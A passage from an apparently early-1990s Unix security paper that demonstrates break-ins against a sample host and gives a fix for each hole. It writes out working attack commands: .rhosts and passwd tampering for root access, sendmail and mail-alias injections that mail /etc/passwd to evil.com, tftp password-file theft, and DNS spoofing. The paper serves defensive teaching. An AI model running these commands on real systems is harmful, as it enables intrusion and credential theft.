1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
|
|||
|
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
|
|||
|
1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest
|
|||
|
evil # su guest
|
|||
|
evil % echo victim.com >> guest/.rhosts
|
|||
|
evil % rlogin victim.com
|
|||
|
Welcome to victim.com!
|
|||
|
victim %
|
|||
|
|
|||
|
If, instead of home directories, victim.com were exporting filesystems
|
|||
|
with user commands (say, /usr or /usr/local/bin), you could replace a
|
|||
|
command with a trojan horse that executes any command of your choice.
|
|||
|
The next user to execute that command would execute your program.
|
|||
|
|
|||
|
We suggest that filesystems be exported:
|
|||
|
|
|||
|
o Read/write only to specific, trusted clients.
|
|||
|
o Read-only, where possible (data or programs can often be
|
|||
|
exported in this manner.)
|
|||
|
|
|||
|
If the target has a "+" wildcard in its /etc/hosts.equiv (the default in
|
|||
|
various vendor's machines) or has the netgroups bug (CERT advisory
|
|||
|
91:12), any non-root user with a login name in the target's password
|
|||
|
file can rlogin to the target without a password. And since the user
|
|||
|
"bin" often owns key files and directories, your next attack is to try
|
|||
|
to log in to the target host and modify the password file to let you
|
|||
|
have root access:
|
|||
|
|
|||
|
evil % whoami
|
|||
|
bin
|
|||
|
evil % rsh victim.com csh -i
|
|||
|
Warning: no access to tty; thus no job control in this shell...
|
|||
|
victim % ls -ldg /etc
|
|||
|
drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc
|
|||
|
victim % cd /etc
|
|||
|
victim % mv passwd pw.old
|
|||
|
victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
|
|||
|
victim % ^D
|
|||
|
evil % rlogin victim.com -l toor
|
|||
|
Welcome to victim.com!
|
|||
|
victim #
|
|||
|
|
|||
|
A few notes about the method used above; "rsh victim.com csh -i" is used
|
|||
|
to initially get onto the system because it doesn't leave any traces in
|
|||
|
the wtmp or utmp system auditing files, making the rsh invisible for
|
|||
|
finger and who. The remote shell isn't attached to a pseudo-terminal,
|
|||
|
however, so that screen-oriented programs such as pagers and editors
|
|||
|
will fail -- but it is very handy for brief exploration.
|
|||
|
|
|||
|
The COPS security auditing tool (see appendix D) will report key files
|
|||
|
or directories that are writable to accounts other than the
|
|||
|
superuser. If you run SunOS 4.x you can apply patch 100103 to fix most
|
|||
|
file permission problems. On many systems, rsh probes as shown above,
|
|||
|
even when successful, would remain completely unnoticed; the tcp wrapper
|
|||
|
(appendix D), which logs incoming connections, can help to expose such
|
|||
|
activities.
|
|||
|
|
|||
|
----
|
|||
|
|
|||
|
What now? Have you uncovered all the holes on your target system? Not
|
|||
|
by a long shot. Going back to the finger results on your target, you
|
|||
|
notice that it has an "ftp" account, which usually means that anonymous
|
|||
|
ftp is enabled. Anonymous ftp can be an easy way to get access, as it
|
|||
|
is often misconfigured. For example, the target may have a complete
|
|||
|
copy of the /etc/passwd file in the anonymous ftp ~ftp/etc directory
|
|||
|
instead of a stripped down version. In this example, though, you see
|
|||
|
that the latter doesn't seem to be true (how can you tell without
|
|||
|
actually examining the file?) However, the home directory of ftp on
|
|||
|
victim.com is writable. This allows you to remotely execute a command
|
|||
|
-- in this case, mailing the password file back to yourself -- by the
|
|||
|
simple method of creating a .forward file that executes a command when
|
|||
|
mail is sent to the ftp account. This is the same mechanism of piping
|
|||
|
mail to a program that the "vacation" program uses to automatically
|
|||
|
reply to mail messages.
|
|||
|
|
|||
|
evil % cat forward_sucker_file
|
|||
|
"|/bin/mail zen@evil.com < /etc/passwd"
|
|||
|
|
|||
|
evil % ftp victim.com
|
|||
|
Connected to victim.com
|
|||
|
220 victim FTP server ready.
|
|||
|
Name (victim.com:zen): ftp
|
|||
|
331 Guest login ok, send ident as password.
|
|||
|
Password:
|
|||
|
230 Guest login ok, access restrictions apply.
|
|||
|
ftp> ls -lga
|
|||
|
200 PORT command successful.
|
|||
|
150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 bytes).
|
|||
|
total 5
|
|||
|
drwxr-xr-x 4 101 1 512 Jun 20 1991 .
|
|||
|
drwxr-xr-x 4 101 1 512 Jun 20 1991 ..
|
|||
|
drwxr-xr-x 2 0 1 512 Jun 20 1991 bin
|
|||
|
drwxr-xr-x 2 0 1 512 Jun 20 1991 etc
|
|||
|
drwxr-xr-x 3 101 1 512 Aug 22 1991 pub
|
|||
|
226 ASCII Transfer complete.
|
|||
|
242 bytes received in 0.066 seconds (3.6 Kbytes/s)
|
|||
|
ftp> put forward_sucker_file .forward
|
|||
|
43 bytes sent in 0.0015 seconds (28 Kbytes/s)
|
|||
|
ftp> quit
|
|||
|
evil % echo test | mail ftp@victim.com
|
|||
|
|
|||
|
Now you simply wait for the password file to be sent back to you.
|
|||
|
|
|||
|
The security auditing tool COPS will check your anonymous ftp setup; see
|
|||
|
the man page for ftpd, the documentation/code for COPS, or CERT advisory
|
|||
|
93:10 for information on how to set up anonymous ftp correctly.
|
|||
|
Vulnerabilities in ftp are often a matter of incorrect ownership or
|
|||
|
permissions of key files or directories. At the very least, make sure
|
|||
|
that ~ftp and all "system" directories and files below ~ftp are owned by
|
|||
|
root and are not writable by any user.
|
|||
|
|
|||
|
While looking at ftp, you can check for an older bug that was once
|
|||
|
widely exploited:
|
|||
|
|
|||
|
% ftp -n
|
|||
|
ftp> open victim.com
|
|||
|
Connected to victim.com
|
|||
|
220 victim.com FTP server ready.
|
|||
|
ftp> quote user ftp
|
|||
|
331 Guest login ok, send ident as password.
|
|||
|
ftp> quote cwd ~root
|
|||
|
530 Please login with USER and PASS.
|
|||
|
ftp> quote pass ftp
|
|||
|
230 Guest login ok, access restrictions apply.
|
|||
|
ftp> ls -al / (or whatever)
|
|||
|
|
|||
|
If this works, you now are logged in as root, and able to modify the
|
|||
|
password file, or whatever you desire. If your system exhibits this
|
|||
|
bug, you should definitely get an update to your ftpd daemon, either
|
|||
|
from your vendor or (via anon ftp) from ftp.uu.net.
|
|||
|
|
|||
|
The wuarchive ftpd, a popular replacement ftp daemon put out by the
|
|||
|
Washington University in Saint Louis, had almost the same problem. If
|
|||
|
your wuarchive ftpd pre-dates April 8, 1993, you should replace it by a
|
|||
|
more recent version.
|
|||
|
|
|||
|
Finally, there is a program vaguely similar to ftp -- tftp, or the
|
|||
|
trivial file transfer program. This daemon doesn't require any password
|
|||
|
for authentication; if a host provides tftp without restricting the
|
|||
|
access (usually via some secure flag set in the inetd.conf file), an
|
|||
|
attacker can read and write files anywhere on the system. In the
|
|||
|
example, you get the remote password file and place it in your local
|
|||
|
/tmp directory:
|
|||
|
|
|||
|
evil % tftp
|
|||
|
tftp> connect victim.com
|
|||
|
tftp> get /etc/passwd /tmp/passwd.victim
|
|||
|
tftp> quit
|
|||
|
|
|||
|
For security's sake, tftp should not be run; if tftp is necessary, use
|
|||
|
the secure option/flag to restrict access to a directory that has no
|
|||
|
valuable information, or run it under the control of a chroot wrapper
|
|||
|
program.
|
|||
|
|
|||
|
----
|
|||
|
|
|||
|
If none of the previous methods have worked, it is time to go on to more
|
|||
|
drastic measures. You have a friend in rpcinfo, another very handy
|
|||
|
program, sometimes even more useful than finger. Many hosts run RPC
|
|||
|
services that can be exploited; rpcinfo can talk to the portmapper and
|
|||
|
show you the way. It can tell you if the host is running NIS, if it is
|
|||
|
a NIS server or slave, if a diskless workstation is around, if it is
|
|||
|
running NFS, any of the info services (rusersd, rstatd, etc.), or any
|
|||
|
other unusual programs (auditing or security related). For instance,
|
|||
|
going back to our sample target:
|
|||
|
|
|||
|
evil % rpcinfo -p victim.com [output trimmed for brevity's sake]
|
|||
|
program vers proto port
|
|||
|
100004 2 tcp 673 ypserv
|
|||
|
100005 1 udp 721 mountd
|
|||
|
100003 2 udp 2049 nfs
|
|||
|
100026 1 udp 733 bootparam
|
|||
|
100017 1 tcp 1274 rexd
|
|||
|
|
|||
|
In this case, you can see several significant facts about our target;
|
|||
|
first of which is that it is an NIS server. It is perhaps not widely
|
|||
|
known, but once you know the NIS domainname of a server, you can get any
|
|||
|
of its NIS maps by a simple rpc query, even when you are outside the
|
|||
|
subnet served by the NIS server (for example, using the YPX program that
|
|||
|
can be found in the comp.sources.misc archives on ftp.uu.net). In
|
|||
|
addition, very much like easily guessed passwords, many systems use
|
|||
|
easily guessed NIS domainnames. Trying to guess the NIS domainname is
|
|||
|
often very fruitful. Good candidates are the fully and partially
|
|||
|
qualified hostname (e.g. "victim" and "victim.com"), the organization
|
|||
|
name, netgroup names in "showmount" output, and so on. If you wanted to
|
|||
|
guess that the domainname was "victim", you could type:
|
|||
|
|
|||
|
evil % ypwhich -d victim victim.com
|
|||
|
Domain victim not bound.
|
|||
|
|
|||
|
This was an unsuccessful attempt; if you had guessed correctly it would
|
|||
|
have returned with the host name of victim.com's NIS server. However,
|
|||
|
note from the NFS section that victim.com is exporting the "/var"
|
|||
|
directory to the world. All that is needed is to mount this directory
|
|||
|
and look in the "yp" subdirectory -- among other things you will see
|
|||
|
another subdirectory that contains the domainname of the target.
|
|||
|
|
|||
|
evil # mount victim.com:/var /foo
|
|||
|
evil # cd /foo
|
|||
|
evil # /bin/ls -alg /foo/yp
|
|||
|
total 17
|
|||
|
1 drwxr-sr-x 4 root staff 512 Jul 12 14:22 .
|
|||
|
1 drwxr-sr-x 11 root staff 512 Jun 29 10:54 ..
|
|||
|
11 -rwxr-xr-x 1 root staff 10993 Apr 22 11:56 Makefile
|
|||
|
1 drwxr-sr-x 2 root staff 512 Apr 22 11:20 binding
|
|||
|
2 drwxr-sr-x 2 root staff 1536 Jul 12 14:22 foo_bar
|
|||
|
[...]
|
|||
|
|
|||
|
In this case, "foo_bar" is the NIS domain name.
|
|||
|
|
|||
|
In addition, the NIS maps often contain a good list of user/employee
|
|||
|
names as well as internal host lists, not to mention passwords for
|
|||
|
cracking.
|
|||
|
|
|||
|
Appendix C details the results of a case study on NIS password files.
|
|||
|
|
|||
|
----
|
|||
|
|
|||
|
You note that the rpcinfo output also showed that victim.com runs rexd.
|
|||
|
Like the rsh daemon, rexd processes requests of the form "please execute
|
|||
|
this command as that user". Unlike rshd, however, rexd does not care if
|
|||
|
the client host is in the hosts.equiv or .rhost files. Normally the rexd
|
|||
|
client program is the "on" command, but it only takes a short C program
|
|||
|
to send arbitrary client host and userid information to the rexd server;
|
|||
|
rexd will happily execute the command. For these reasons, running rexd
|
|||
|
is similar to having no passwords at all: all security is in the client,
|
|||
|
not in the server where it should be. Rexd security can be improved
|
|||
|
somewhat by using secure RPC.
|
|||
|
|
|||
|
----
|
|||
|
|
|||
|
While looking at the output from rpcinfo, you observe that victim.com
|
|||
|
also seems to be a server for diskless workstations. This is evidenced
|
|||
|
by the presence of the bootparam service, which provides information to
|
|||
|
the diskless clients for booting. If you ask nicely, using
|
|||
|
BOOTPARAMPROC_WHOAMI and provide the address of a client, you can get
|
|||
|
its NIS domainname. This can be very useful when combined with the fact
|
|||
|
that you can get arbitrary NIS maps (such as the password file) when you
|
|||
|
know the NIS domainname. Here is a sample code snippet to do just that
|
|||
|
(bootparam is part of SATAN.)
|
|||
|
|
|||
|
char *server;
|
|||
|
struct bp_whoami_arg arg; /* query */
|
|||
|
struct bp_whoami_res res; /* reply */
|
|||
|
|
|||
|
/* initializations omitted... */
|
|||
|
|
|||
|
callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS, BOOTPARAMPROC_WHOAMI,
|
|||
|
xdr_bp_whoami_arg, &arg, xdr_bp_whoami_res, &res);
|
|||
|
|
|||
|
printf("%s has nisdomain %s\n", server, res.domain_name);
|
|||
|
|
|||
|
The showmount output indicated that "easy" is a diskless client of
|
|||
|
victim.com, so we use its client address in the BOOTPARAMPROC_WHOAMI
|
|||
|
query:
|
|||
|
|
|||
|
evil % bootparam victim.com easy.victim.com
|
|||
|
victim.com has nisdomain foo_bar
|
|||
|
|
|||
|
----
|
|||
|
|
|||
|
NIS masters control the mail aliases for the NIS domain in question.
|
|||
|
Just like local mail alias files, you can create a mail alias that will
|
|||
|
execute commands when mail is sent to it (a once popular example of this
|
|||
|
is the "decode" alias which uudecodes mail files sent to it.) For
|
|||
|
instance, here you create an alias "foo", which mails the password file
|
|||
|
back to evil.com by simply mailing any message to it:
|
|||
|
|
|||
|
nis-master # echo 'foo: "| mail zen@evil.com < /etc/passwd "' >> /etc/aliases
|
|||
|
nis-master # cd /var/yp
|
|||
|
nis-master # make aliases
|
|||
|
nis-master # echo test | mail -v foo@victim.com
|
|||
|
|
|||
|
Hopefully attackers won't have control of your NIS master host, but even
|
|||
|
more hopefully the lesson is clear -- NIS is normally insecure, but if
|
|||
|
an attacker has control of your NIS master, then s/he effectively has
|
|||
|
control of the client hosts (e.g. can execute arbitrary commands).
|
|||
|
|
|||
|
There aren't many effective defenses against NIS attacks; it is an
|
|||
|
insecure service that has almost no authentication between clients and
|
|||
|
servers. To make things worse, it seems fairly clear that arbitrary
|
|||
|
maps can be forced onto even master servers (e.g., it is possible to
|
|||
|
treat an NIS server as a client). This, obviously, would subvert the
|
|||
|
entire schema. If it is absolutely necessary to use NIS, choosing a
|
|||
|
hard to guess domainname can help slightly, but if you run diskless
|
|||
|
clients that are exposed to potential attackers then it is trivial for
|
|||
|
an attacker to defeat this simple step by using the bootparam trick to
|
|||
|
get the domainname. If NIS is used to propagate the password maps, then
|
|||
|
shadow passwords do not give additional protection because the shadow
|
|||
|
map is still accessible to any attacker that has root on an attacking
|
|||
|
host. Better is to use NIS as little as possible, or to at least
|
|||
|
realize that the maps can be subject to perusal by potentially hostile
|
|||
|
forces.
|
|||
|
|
|||
|
Secure RPC goes a long way to diminish the threat, but it has its own
|
|||
|
problems, primarily in that it is difficult to administer, but also in
|
|||
|
that the cryptographic methods used within are not very strong. It has
|
|||
|
been rumored that NIS+, Sun's new network information service, fixes
|
|||
|
some of these problems, but until now it has been limited to running on
|
|||
|
Suns, and thus far has not lived up to the promise of the design.
|
|||
|
Finally, using packet filtering (at the very least port 111) or
|
|||
|
securelib (see appendix D), or, for Suns, applying Sun patch 100482-02
|
|||
|
all can help.
|
|||
|
|
|||
|
----
|
|||
|
|
|||
|
The portmapper only knows about RPC services. Other network services
|
|||
|
can be located with a brute-force method that connects to all network
|
|||
|
ports. Many network utilities and windowing systems listen to specific
|
|||
|
ports (e.g. sendmail is on port 25, telnet is on port 23, X windows is
|
|||
|
usually on port 6000, etc.) SATAN includes a program that scans the
|
|||
|
ports of a remote hosts and reports on its findings; if you run it
|
|||
|
against our target, you see:
|
|||
|
|
|||
|
evil % tcpmap victim.com
|
|||
|
Mapping 128.128.128.1
|
|||
|
port 21: ftp
|
|||
|
port 23: telnet
|
|||
|
port 25: smtp
|
|||
|
port 37: time
|
|||
|
port 79: finger
|
|||
|
port 512: exec
|
|||
|
port 513: login
|
|||
|
port 514: shell
|
|||
|
port 515: printer
|
|||
|
port 6000: (X)
|
|||
|
|
|||
|
This suggests that victim.com is running X windows. If not protected
|
|||
|
properly (via the magic cookie or xhost mechanisms), window displays can
|
|||
|
be captured or watched, user keystrokes may be stolen, programs executed
|
|||
|
remotely, etc. Also, if the target is running X and accepts a telnet to
|
|||
|
port 6000, that can be used for a denial of service attack, as the
|
|||
|
target's windowing system will often "freeze up" for a short period of
|
|||
|
time. One method to determine the vulnerability of an X server is to
|
|||
|
connect to it via the XOpenDisplay() function; if the function returns
|
|||
|
NULL then you cannot access the victim's display (opendisplay is part of
|
|||
|
SATAN):
|
|||
|
|
|||
|
char *hostname;
|
|||
|
|
|||
|
if (XOpenDisplay(hostname) == NULL) {
|
|||
|
printf("Cannot open display: %s\n", hostname);
|
|||
|
} else {
|
|||
|
printf("Can open display: %s\n", hostname);
|
|||
|
}
|
|||
|
|
|||
|
evil % opendisplay victim.com:0
|
|||
|
Cannot open display: victim.com:0
|
|||
|
|
|||
|
X terminals, though much less powerful than a complete UNIX system, can
|
|||
|
have their own security problems. Many X terminals permit unrestricted
|
|||
|
rsh access, allowing you to start X client programs in the victim's
|
|||
|
terminal with the output appearing on your own screen:
|
|||
|
|
|||
|
evil % xhost +xvictim.victim.com
|
|||
|
evil % rsh xvictim.victim.com telnet victim.com -display evil.com
|
|||
|
|
|||
|
In any case, give as much thought to your window security as your
|
|||
|
filesystem and network utilities, for it can compromise your system as
|
|||
|
surely as a "+" in your hosts.equiv or a passwordless (root) account.
|
|||
|
|
|||
|
----
|
|||
|
|
|||
|
Next, you examine sendmail. Sendmail is a very complex program that has
|
|||
|
a long history of security problems, including the infamous "wiz"
|
|||
|
command (hopefully long since disabled on all machines). You can often
|
|||
|
determine the OS, sometimes down to the version number, of the target,
|
|||
|
by looking at the version number returned by sendmail. This, in turn,
|
|||
|
can give you hints as to how vulnerable it might be to any of the
|
|||
|
numerous bugs. In addition, you can see if they run the "decode" alias,
|
|||
|
which has its own set of problems:
|
|||
|
|
|||
|
evil % telnet victim.com 25
|
|||
|
connecting to host victim.com (128.128.128.1.), port 25
|
|||
|
connection open
|
|||
|
220 victim.com Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT
|
|||
|
expn decode
|
|||
|
250 <"|/usr/bin/uudecode">
|
|||
|
quit
|
|||
|
|
|||
|
Running the "decode" alias is a security risk -- it allows potential
|
|||
|
attackers to overwrite any file that is writable by the owner of that
|
|||
|
alias -- often daemon, but potentially any user. Consider this piece of
|
|||
|
mail -- this will place "evil.com" in user zen's .rhosts file if it is
|
|||
|
writable:
|
|||
|
|
|||
|
evil % echo "evil.com" | uuencode /home/zen/.rhosts | mail decode@victim.com
|
|||
|
|
|||
|
If no home directories are known or writable, an interesting variation
|
|||
|
of this is to create a bogus /etc/aliases.pag file that contains an
|
|||
|
alias with a command you wish to execute on your target. This may work
|
|||
|
since on many systems the aliases.pag and aliases.dir files, which
|
|||
|
control the system's mail aliases, are writable to the world.
|
|||
|
|
|||
|
evil % cat decode
|
|||
|
bin: "| cat /etc/passwd | mail zen@evil.com"
|
|||
|
evil % newaliases -oQ/tmp -oA`pwd`/decode
|
|||
|
evil % uuencode decode.pag /etc/aliases.pag | mail decode@victom.com
|
|||
|
evil % /usr/lib/sendmail -fbin -om -oi bin@victim.com < /dev/null
|
|||
|
|
|||
|
A lot of things can be found out by just asking sendmail if an address
|
|||
|
is acceptable (vrfy), or what an address expands to (expn). When the
|
|||
|
finger or rusers services are turned off, vrfy and expn can still be
|
|||
|
used to identify user accounts or targets. Vrfy and expn can also be
|
|||
|
used to find out if the user is piping mail through any program that
|
|||
|
might be exploited (e.g. vacation, mail sorters, etc.). It can be a
|
|||
|
good idea to disable the vrfy and expn commands: in most versions, look
|
|||
|
at the source file srvrsmtp.c, and either delete or change the two lines
|
|||
|
in the CmdTab structure that have the strings "vrfy" and "expn". Sites
|
|||
|
without source can still disable expn and vrfy by just editing the
|
|||
|
sendmail executable with a binary editor and replacing "vrfy" and "expn"
|
|||
|
with blanks. Acquiring a recent version of sendmail (see Appendix D) is
|
|||
|
also an extremely good idea, since there have probably been more
|
|||
|
security bugs reported in sendmail than in any other UNIX program.
|
|||
|
|
|||
|
----
|
|||
|
|
|||
|
As a sendmail-sendoff, there are two fairly well known bugs that should
|
|||
|
be checked into. The first was definitely fixed in version 5.59 from
|
|||
|
Berkeley; despite the messages below, for versions of sendmail previous
|
|||
|
to 5.59, the "evil.com" gets appended, despite the error messages, along
|
|||
|
with all of the typical mail headers, to the file specified:
|
|||
|
|
|||
|
% cat evil_sendmail
|
|||
|
telnet victim.com 25 << EOSM
|
|||
|
rcpt to: /home/zen/.rhosts
|
|||
|
mail from: zen
|
|||
|
data
|
|||
|
random garbage
|
|||
|
.
|
|||
|
rcpt to: /home/zen/.rhosts
|
|||
|
mail from: zen
|
|||
|
data
|
|||
|
evil.com
|
|||
|
.
|
|||
|
quit
|
|||
|
EOSM
|
|||
|
|
|||
|
evil % /bin/sh evil_sendmail
|
|||
|
Trying 128.128.128.1
|
|||
|
Connected to victim.com
|
|||
|
Escape character is '^]'.
|
|||
|
Connection closed by foreign host.
|
|||
|
|
|||
|
evil % rlogin victim.com -l zen
|
|||
|
Welcome to victim.com!
|
|||
|
victim %
|
|||
|
|
|||
|
The second hole, fixed only recently, permitted anyone to specify
|
|||
|
arbitrary shell commands and/or pathnames for the sender and/or
|
|||
|
destination address. Attempts to keep details secret were in vain, and
|
|||
|
extensive discussions in mailing lists and usenet news groups led to
|
|||
|
disclosure of how to exploit some versions of the bug. As with many
|
|||
|
UNIX bugs, nearly every vendor's sendmail was vulnerable to the problem,
|
|||
|
since they all share a common source code tree ancestry. Space
|
|||
|
precludes us from discussing it fully, but a typical attack to get the
|
|||
|
password file might look like this:
|
|||
|
|
|||
|
evil % telnet victim.com 25
|
|||
|
Trying 128.128.128.1...
|
|||
|
Connected to victim.com
|
|||
|
Escape character is '^]'.
|
|||
|
220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
|
|||
|
mail from: "|/bin/mail zen@evil.com < /etc/passwd"
|
|||
|
250 "|/bin/mail zen@evil.com < /etc/passwd"... Sender ok
|
|||
|
rcpt to: nosuchuser
|
|||
|
550 nosuchuser... User unknown
|
|||
|
data
|
|||
|
354 Enter mail, end with "." on a line by itself
|
|||
|
.
|
|||
|
250 Mail accepted
|
|||
|
quit
|
|||
|
Connection closed by foreign host.
|
|||
|
evil %
|
|||
|
|
|||
|
At the time of writing, version 8.6.4 of sendmail (see Appendix D for
|
|||
|
information on how to get this) is reportedly the only variant of
|
|||
|
sendmail with all of the recent security bugs fixed.
|
|||
|
|
|||
|
Trust
|
|||
|
-----
|
|||
|
|
|||
|
For our final topic of vulnerability, we'll digress from the practical
|
|||
|
strategy we've followed previously to go a bit more into the theoretical
|
|||
|
side, and briefly discuss the notion of trust. The issues and
|
|||
|
implications of vulnerabilities here are a bit more subtle and
|
|||
|
far-reaching than what we've covered before; in the context of this
|
|||
|
paper we use the word trust whenever there is a situation when a server
|
|||
|
(note that any host that allows remote access can be called a server)
|
|||
|
can permit a local resource to be used by a client without password
|
|||
|
authentication when password authentication is normally required. In
|
|||
|
other words, we arbitrarily limit the discussion to clients in disguise.
|
|||
|
|
|||
|
There are many ways that a host can trust: .rhosts and hosts.equiv files
|
|||
|
that allow access without password verification; window servers that
|
|||
|
allow remote systems to use and abuse privileges; export files that
|
|||
|
control access via NFS, and more.
|
|||
|
|
|||
|
Nearly all of these rely on client IP address to hostname conversion to
|
|||
|
determine whether or not service is to be granted. The simplest method
|
|||
|
uses the /etc/hosts file for a direct lookup. However, today most hosts
|
|||
|
use either DNS (the Domain Name Service), NIS, or both for name lookup
|
|||
|
service. A reverse lookup occurs when a server has an IP address (from
|
|||
|
a client host connecting to it) and wishes to get the corresponding
|
|||
|
client hostname.
|
|||
|
|
|||
|
Although the concept of how host trust works is well understood by most
|
|||
|
system administrators, the _dangers_ of trust, and the _practical_
|
|||
|
problem it represents, irrespective of hostname impersonation, is one of
|
|||
|
the least understood problems we know of on the Internet. This goes far
|
|||
|
beyond the obvious hosts.equiv and rhosts files; NFS, NIS, windowing
|
|||
|
systems -- indeed, much of the useful services in UNIX are based on the
|
|||
|
concept that well known (to an administrator or user) sites are trusted
|
|||
|
in some way. What is not understood is how networking so tightly binds
|
|||
|
security between what are normally considered disjoint hosts.
|
|||
|
|
|||
|
Any form of trust can be spoofed, fooled, or subverted, especially when
|
|||
|
the authority that gets queried to check the credentials of the client
|
|||
|
is either outside of the server's administrative domain, or when the
|
|||
|
trust mechanism is based on something that has a weak form of
|
|||
|
authentication; both are usually the case.
|
|||
|
|
|||
|
Obviously, if the host containing the database (either NIS, DNS, or
|
|||
|
whatever) has been compromised, the intruder can convince the target
|
|||
|
host that s/he is coming from any trusted host; it is now sufficient to
|
|||
|
find out which hosts are trusted by the target. This task is often
|
|||
|
greatly helped by examining where system administrators and system
|
|||
|
accounts (such as root, etc.) last logged in from. Going back to our
|
|||
|
target, victim.com, you note that root and some other system accounts
|
|||
|
logged in from big.victim.com. You change the PTR record for evil.com so
|
|||
|
that when you attempt to rlogin in from evil.com to victim.com,
|
|||
|
victim.com will attempt to look up your hostname and will find what you
|
|||
|
placed in the record. If the record in the DNS database looks like:
|
|||
|
|
|||
|
1.192.192.192.in-addr.arpa IN PTR evil.com
|
|||
|
|
|||
|
And you change it to:
|
|||
|
|
|||
|
1.192.192.192.in-addr.arpa IN PTR big.victim.com
|
|||
|
|
|||
|
then, depending on how naive victim.com's system software is, victim.com
|
|||
|
will believe the login comes from big.victim.com, and, assuming that
|
|||
|
big.victim.com is in the /etc/hosts.equiv or /.rhosts files, you will be
|
|||
|
able to login without supplying a password. With NIS, it is a simple
|
|||
|
matter of either editing the host database on the NIS master (if this is
|
|||
|
controlled by the intruder) or of spoofing or forcing NIS (see
|
|||
|
discussion on NIS security above) to supply the target with whatever
|
|||
|
information you desire. Although more complex, interesting, and
|
|||
|
damaging attacks can be mounted via DNS, time and space don't allow
|
|||
|
coverage of these methods here.
|
|||
|
|
|||
|
Two methods can be used to prevent such attacks. The first is the most
|
|||
|
direct, but perhaps the most impractical. If your site doesn't use any
|
|||
|
trust, you won't be as vulnerable to host spoofing. The other strategy
|
|||
|
is to use cryptographic protocols. Using the secure RPC protocol (used
|
|||
|
in secure NFS, NIS+, etc.) is one method; although it has been "broken"
|
|||
|
cryptographically, it still provides better assurance than RPC
|
|||
|
authentication schemes that do not use any form of encryption. Other
|
|||
|
solutions, both hardware (smartcards) and software (Kerberos), are being
|
|||
|
developed, but they are either incomplete or require changes to system
|
|||
|
software.
|
|||
|
|
|||
|
Appendix B details the results of an informal survey taken from a
|
|||
|
variety of hosts on the Internet.
|
|||
|
|
|||
|
Protecting the system
|
|||
|
---------------------
|
|||
|
|
|||
|
It is our hope that we have demonstrated that even some of the most
|
|||
|
seemingly innocuous services run can offer (sometimes unexpectedly)
|
|||
|
ammunition to determined system crackers. But, of course, if security
|
|||
|
were all that mattered, computers would never be turned on, let alone
|
|||
|
hooked into a network with literally millions of potential intruders.
|
|||
|
Rather than reiterating specific advice on what to switch on or off, we
|
|||
|
instead offer some general suggestions:
|
|||
|
|
|||
|
o If you cannot turn off the finger service, consider installing a
|
|||
|
modified finger daemon. It is rarely necessary to reveal a user's home
|
|||
|
directory and the source of last login.
|
|||
|
|
|||
|
o Don't run NIS unless it's absolutely necessary. Use NFS as little
|
|||
|
as possible.
|
|||
|
|
|||
|
o Never export NFS filesystems unrestricted to the world. Try to
|
|||
|
export file systems read-only where possible.
|
|||
|
|
|||
|
o Fortify and protect servers (e.g. hosts that provide a service to
|
|||
|
other hosts -- NFS, NIS, DNS, whatever.) Only allow administrative
|
|||
|
accounts on these hosts.
|
|||
|
|
|||
|
o Examine carefully services offered by inetd and the portmapper.
|
|||
|
Eliminate any that aren't explicitly needed. Use Wietse Venema's inetd
|
|||
|
wrappers, if for no other reason than to log the sources of connections
|
|||
|
to your host. This adds immeasurably to the standard UNIX auditing
|
|||
|
features, especially with respect to network attacks. If possible, use
|
|||
|
the loghost mechanism of syslog to collect security-related information
|
|||
|
on a secure host.
|
|||
|
|
|||
|
o Eliminate trust unless there is an absolute need for it. Trust is
|
|||
|
your enemy.
|
|||
|
|
|||
|
o Use shadow passwords and a passwd command that disallows poor
|
|||
|
passwords. Disable or delete unused/dormant system or user accounts.
|
|||
|
|
|||
|
o Keep abreast of current literature (see our suggested reading list and
|
|||
|
bibliography at the end of this paper) and security tools; communicate
|
|||
|
to others about security problems and incidents. At minimum, subscribe
|
|||
|
to the CERT mailing list and phrack magazine (plus the firewalls mailing
|
|||
|
list, if your site is using or thinking about installing a firewall) and
|
|||
|
read the usenet security newsgroups to get the latest information on
|
|||
|
security problems. Ignorance is the deadliest security problem we are
|
|||
|
aware of.
|
|||
|
|
|||
|
o Install all vendor security patches as soon as possible, on all of
|
|||
|
your hosts. Examine security patch information for other vendors - many
|
|||
|
bugs (rdist, sendmail) are common to many UNIX variants.
|
|||
|
|
|||
|
It is interesting to note that common solutions to security problems
|
|||
|
such as running Kerberos or using one-time passwords or digital tokens
|
|||
|
are ineffective against most of the attacks we discuss here. We
|
|||
|
heartily recommend the use of such systems, but be aware that they are
|
|||
|
_not_ a total security solution -- they are part of a larger struggle to
|
|||
|
defend your system.
|
|||
|
|
|||
|
Conclusions
|
|||
|
-----------
|
|||
|
|
|||
|
Perhaps none of the methods shown here are surprising; when writing this
|
|||
|
paper, we didn't learn very much about how to break into systems. What
|
|||
|
we _did_ learn was, while testing these methods out on our own systems
|
|||
|
and that of friendly sites, just how effective this set of methods is
|
|||
|
for gaining access to a typical (UNIX) Internet host. Tiring of trying
|
|||
|
to type these in all by hand, and desiring to keep our own systems more
|
|||
|
secure, we decided to implement a security tool (SATAN) that attempts to
|
|||
|
check remote hosts for at least some of the problems discussed here.
|
|||
|
The typical response, when telling people about our paper and our tool
|
|||
|
was something on the order of "that sounds pretty dangerous -- I hope
|
|||
|
you're not going to give it out to everybody. But you since you can
|
|||
|
trust me, may I have a copy of it?"
|
|||
|
|
|||
|
We never set out to create a cookbook or toolkit of methods and programs
|
|||
|
on how to break into systems -- instead, we saw that these same methods
|
|||
|
were being used, every day, against ourselves and against friendly
|
|||
|
system administrators. We believe that by propagating information that
|
|||
|
normally wasn't available to those outside of the underworld, we can
|
|||
|
increase security by raising awareness. Trying to restrict access to
|
|||
|
"dangerous" security information has never seemed to be a very effective
|
|||
|
method for increasing security; indeed, the opposite appears to be the
|
|||
|
case, since the system crackers have shown little reticence to share
|
|||
|
their information with each other.
|
|||
|
|
|||
|
While it is almost certain that some of the information presented here
|
|||
|
is new material to (aspiring) system crackers, and that some will use it
|
|||
|
to gain unauthorized entrance onto hosts, the evidence presented even by
|
|||
|
our ad hoc tests shows that there is a much larger number of insecure
|
|||
|
